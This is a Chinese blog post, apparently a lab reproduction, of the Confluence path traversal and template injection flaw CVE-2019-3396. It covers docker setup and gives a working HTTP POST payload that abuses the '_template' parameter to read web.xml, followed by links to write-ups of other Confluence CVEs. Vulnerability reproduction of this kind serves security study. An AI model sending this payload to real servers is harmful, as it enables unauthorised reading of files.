Atlassian Confluence 路径遍历和命令执行漏洞 (CVE-2019-3396)

最新推荐文章于 2024-08-07 23:11:43 发布
最新推荐文章于 2024-08-07 23:11:43 发布
阅读量294 收藏
点赞数
文章标签: atlassian 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134576569
版权

漏洞描述

Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。

Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞,攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。

漏洞环境及漏洞利用

启动docker环境

环境启动后,访问,您将看到安装指南,选择“试用安装”,然后系统会要求您填写许可证密钥。您应该向 Atlassian 申请 Confluence Server 测试证书:http://your-ip:8090

然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长(建议使用4G以上内存的机器进行安装测试),请耐心等待。

如果系统提示填写群集节点,则可以用 填充路径。/home/confluence

然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长(建议使用4G以上内存的机器进行安装测试),请耐心等待。

如果系统提示填写群集节点,则可以用 填充路径。/home/confluence

如此配置即可,账号密码都为postgres

 

完成所有配置看到以下画面

burp发送payload即可验证漏洞

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 177

{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"./web.xml"}}}

 

blackK_YC
关注
Atlassian Confluence CVE-2022-26134 RCE漏洞
sxr__nc的博客
04-22 1102
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 6380
CVE-2022-26134 Confluence远程命令执行漏洞复现
漏洞复现】CVE-2024-21683:Confluence远程代码执行漏洞
网络安全从业者的学习笔记
07-18 813
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 499
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令
目录遍历漏洞原理、解决方案
qq_44005305的博客
03-10 6553
目录遍历路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令
Atlassian Confluence OGNL表达式注入命令执行漏洞CVE-2021-26084)漏洞复现
m0_64366018的博客
01-16 620
Confluence Data Center上存在一个注入漏洞漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码。
Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396
最新发布
山兔的博客
08-07 488
2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。访问服务器ip地址,如:192.168.109.130:8090 进行安装,安装步骤如下:选择Trial Installation——》Next。直接使用邮箱账号,点击New Trial License——》select product——》Confluence。然后会让你填写用户名,如果提示填写路径路径填写。我这边建立失败了,就不复现了。
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396
qq_45391176的博客
11-09 286
CVE-2019-3396 利用vulhub复现过程
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)复现
玄道的网安博客
01-18 708
简介 Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。 影响版本 6.6.12版本之前所有版本 6.7.0-6.12.2版本 6.13.3之前的所有6.13.x版本 6.14.2之前的所有6.14.x版本 环境搭建 这里使用vulhub来安装 地址: https://github.com/vulhub/vulhub/tree/m...
利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396
JiangBuLiu的博客
06-28 2096
Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/confluence/CVE-2019-3396/ 漏洞原理 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本...
Confluence 漏洞分析排查
dayouzi的博客
08-14 261
Confluence Server 和 Data Center 中的 Widget Connector 中存在服Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。1、其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令
CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7966
CVE-2022-26134】Confluence OGNL RCE 漏洞
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)漏洞复现
qq_36334672的博客
01-25 446
Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令
Atlassian Confluence 远程代码执行漏洞分析(CVE-2023-22518)
hackzkaq的博客
11-09 658
由于漏洞易于利用且具有严重破坏性(导致数据丢失), 因此本文章中不会公开该漏洞的利用程序. 感兴趣的读者, 可以按照文章中的思路来复现该漏洞. 请注意, 本文仅供学习目的使用.
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3851
CVE-2021-26084 CVE-2022-26134 漏洞复现
Confluence 6 Confluence 安装目录
HONEY MOOSE
07-03 1216
Confluence 安装的目录(Confluence Installation directory)定义的是 Confluence 是在那里进行安装的。这个目录有时候也被称为 Confluence 安装目录(Confluence Install directory)。安装目录中的一些重要文件:bin/setenv.bat or bin/setenv.sh这个文件通常被用来编辑 CATALINA_...
Atlassian Confluence 远程代码执行/CVE-2022-26134
PolarPeak的博客
06-05 1029
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞CVE-2022-26134)的安全公告。该漏洞的CVSS评分为10分,目前漏洞细节与PoC已被公开披露,且被检测到存在在野利用。 Atlassian ConfluenceAtlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自...
Docker中部署Confluence与Jira-Software详细步骤
"在Docker中部署Confluence和jira-software的方法步骤" 在Docker环境下部署Confluence和jira-software是一项常见的任务,尤其对于需要管理团队协作和项目跟踪的组织来说。以下是一个详细的过程,指导如何在Docker上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值